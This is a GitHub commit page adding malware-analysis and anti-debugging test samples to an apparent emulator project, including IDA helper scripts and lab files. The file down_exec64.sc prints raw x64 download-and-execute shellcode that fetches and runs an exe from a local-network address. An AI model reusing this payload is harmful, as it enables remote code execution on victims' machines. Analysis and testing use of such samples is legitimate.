Skip to content
This repository has been archived by the owner on Sep 10, 2024. It is now read-only.

Commit

Permalink
Samples for testing 👍
Browse files Browse the repository at this point in the history
Enjoy ;)
  • Loading branch information
Coldzer0 committed Sep 29, 2018
1 parent 027fc59 commit 7f99f49
Show file tree
Hide file tree
Showing 96 changed files with 72 additions and 1 deletion.
1 change: 0 additions & 1 deletion .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -44,7 +44,6 @@ __recovery/
# unwanted folders :D
unicorn-engine-pascal
CTF
samples
GDT
win_dlls
Build/OSX
Expand Down
Binary file added samples/AntiDbgx32.exe
Binary file not shown.
Binary file added samples/AntiDbgx64.exe
Binary file not shown.
Binary file added samples/AntiDebugDownloader.exe
Binary file not shown.
Binary file added samples/AntiEmu/blue.exe
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_10L/Lab10-01.sys
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
1 change: 1 addition & 0 deletions samples/BinaryCollection/Chapter_11L/Lab11-02.ini
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
CHMMXaL@MV@SD@O@MXRHRCNNJBNL
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
14 changes: 14 additions & 0 deletions samples/BinaryCollection/Chapter_17L/findAntiVM.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
from idautils import *
from idc import *

heads = Heads(SegStart(ScreenEA()), SegEnd(ScreenEA()))
antiVM = []
for i in heads:
if (GetMnem(i) == "sidt" or GetMnem(i) == "sgdt" or GetMnem(i) == "sldt" or GetMnem(i) == "smsw" or GetMnem(i) == "str" or GetMnem(i) == "in" or GetMnem(i) == "cpuid"):
antiVM.append(i)

print "Number of potential Anti-VM instructions: %d" % (len(antiVM))

for i in antiVM:
SetColor(i, CIC_ITEM, 0x0000ff)
Message("Anti-VM: %08x\n" % i)
Binary file added samples/BinaryCollection/Chapter_18L/Lab18-01.exe
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_18L/Lab18-02.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_18L/Lab18_05.exe
Binary file not shown.
1 change: 1 addition & 0 deletions samples/BinaryCollection/Chapter_19L/Lab19-01.bin
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3�f���^V����Ѐ�A���,AªIu�������IJOFIBOMEAAAAAAAOJDDABAAAAFGFHILHECEAMDBPPPMDBMAKMDIOAHEAKMBMPANABMHOJOPPPPPPPIJPIFPFOMCAEAAGAILGMCECEILEFDMILFEAFHIABOKILEKBIILFKCAABOLODCKEJILDEILABOOFGOILLPPPPPPDLEECECIHFOMILFKCEABOLGGILAMELILFKBMABOLILAEILABOIOJACAAAAAADBMAIJEECEBMGBMCAIAAFGDBMAGEILEADAIFMAHIAPILEAAMILHABMKNILEAAIOJAFAAAAAAOJPLPPPPPPFOMDFLOINJPPPPPPIJMCGIIOEOAOOMFCOIIAPPPPPPIJEFPMGIMBHJOFLIFCOIHCPPPPPPIJEFPIGIIDLJLFHIFCOIGEPPPPPPIJEFPEGIOGBHIPHLFCOIFGPPPPPPIJEFPAGIJIPOIKAOFCOIEIPPPPPPIJEFOMINADFAPPFFPMGIDGBKCPHAFAOIDEPPPPPPIJEFOIGIIAAAAAAAINHLEIFHPPFFPIABMHMHAHFMDBCOGFMHEHAEHIGFAAAADBMJFBFBINEDEIFAINEDAHFAFBPPFFOIGIAFAAAAAAINEDEIFAPPFFOMPPFFPAGIAAAAAAAAFAPPFFPEOIFGPPPPPPFFFCEMENEPEOAAGIHEHEHADKCPCPHHHHHHCOHAHCGBGDHEGJGDGBGMGNGBGMHHGBHCGFGBGOGBGMHJHDGJHDCOGDGPGNCPHDGIGFGMGMGDGPGEGFCPGBGOGOGPHJFPHFHDGFHCCOGFHIGFAA
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_19L/Lab19-03.pdf
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_19L/Lab19-03_sc.bin
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_1L/Lab01-01.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_1L/Lab01-03.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
1 change: 1 addition & 0 deletions samples/BinaryCollection/Chapter_20L/config.dat
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
|y`~`~`NNNNNNN/N6O{NN:N6/{N<N`N+N6N+NNN6O{N��������FNNNNNN|y`~`~`N{NqNNNONNNoNNNfF N�PZN�MNN�F{N�INNNNNN��\N�NH{N6O{NNNNONNN
Expand Down
Binary file added samples/BinaryCollection/Chapter_21L/Lab21-01.exe
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_3L/Lab03-02.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_5L/Lab05-01.dll
Binary file not shown.
6 changes: 6 additions & 0 deletions samples/BinaryCollection/Chapter_5L/Lab05-01.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
sea = ScreenEA()

for i in range(0x00,0x50):
b = Byte(sea+i)
decoded_byte = b ^ 0x55
PatchByte(sea+i,decoded_byte)
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_7L/Lab07-03.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_9L/DLL1.dll
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_9L/DLL2.dll
Binary file not shown.
Binary file added samples/BinaryCollection/Chapter_9L/DLL3.dll
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file added samples/Downloader.exe
Binary file not shown.
Binary file added samples/Int3Hook.exe
Binary file not shown.
Binary file added samples/MessageBox_x64.exe
Binary file not shown.
Binary file added samples/PEB_MSGBOX.exe
Binary file not shown.
Binary file added samples/Shellcodes/MsgBox64.sc
Binary file not shown.
Binary file added samples/Shellcodes/URLDownloadToFile.sc
Binary file not shown.
Binary file added samples/Shellcodes/Wincalc.sc
Binary file not shown.
1 change: 1 addition & 0 deletions samples/Shellcodes/down_exec64.sc
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
HƒěXLŤ4$HƒěXH1ŇeH‹B`H‹pH‹vH­H‹0H‹~0‹_<Hű˛ˆ‹Hű‹sHţfş?‹–HH1ŇAÇurlmfAÇFonAˆVIŤ˙ÓfşJ‹–HH1ŇHąURLDownlI‰HąoadToFilI‰NfAÇFeAAˆVIŤH‰Á˙ÓI‰ÇH¸C:\\UserI‰H¸s\\PubliIFH¸c\\p.exeI‰FH1ŇAˆVIŤNH¸http://1H‰H¸92.168.1H‰AH¸0.129/plH‰AA.exeˆQHƒěXH1ÉIŤVMŤM1ÉLL$ A˙×H1ŇH9ĐuăHƒěXfşk‹–HIŤH1Ҳ˙ÓH1Ňfş"‹–HűIŤH1Ň˙ÓH1Ňfş(‹–HűHƒÄXH1É˙Ó
Binary file added samples/Shellcodes/tm.sc
Binary file not shown.
Binary file added samples/case.exe
Binary file not shown.
Binary file added samples/cpuid.exe
Binary file not shown.
Binary file added samples/dropper.exe
Binary file not shown.
Binary file added samples/mal.exe
Binary file not shown.
Binary file added samples/malxx.exe
Binary file not shown.
Binary file added samples/obfuscated/obfuscated.exe
Binary file not shown.
Binary file added samples/obfuscated/original.exe
Binary file not shown.
48 changes: 48 additions & 0 deletions samples/obfuscated/source.asm
Original file line number Diff line number Diff line change
@@ -0,0 +1,48 @@
;
; Obfuscator v2.0 sample
;
; Bartosz Wójcik | www.pelock.com
;
.586
.model flat,stdcall

includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib

include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\windows.inc

assume fs:flat

.data
szCaption db 'Visit us at www.pelock.com',0
szText db 'Hello world',0
.code


ShowInformation proc

;
; MessageBox(NULL, "Hello world", "Visit us at www.pelock.com", MB_ICONINFORMATION);
;
push MB_ICONINFORMATION
push offset szCaption
push offset szText
push 0
call MessageBoxA

ret

ShowInformation endp

start:
call ShowInformation

;
; ExitProcess(0);
;
push 0
call ExitProcess

end start
Binary file added samples/small.exe
Binary file not shown.
Binary file added samples/url.exe
Binary file not shown.

0 comments on commit 7f99f49

Please sign in to comment.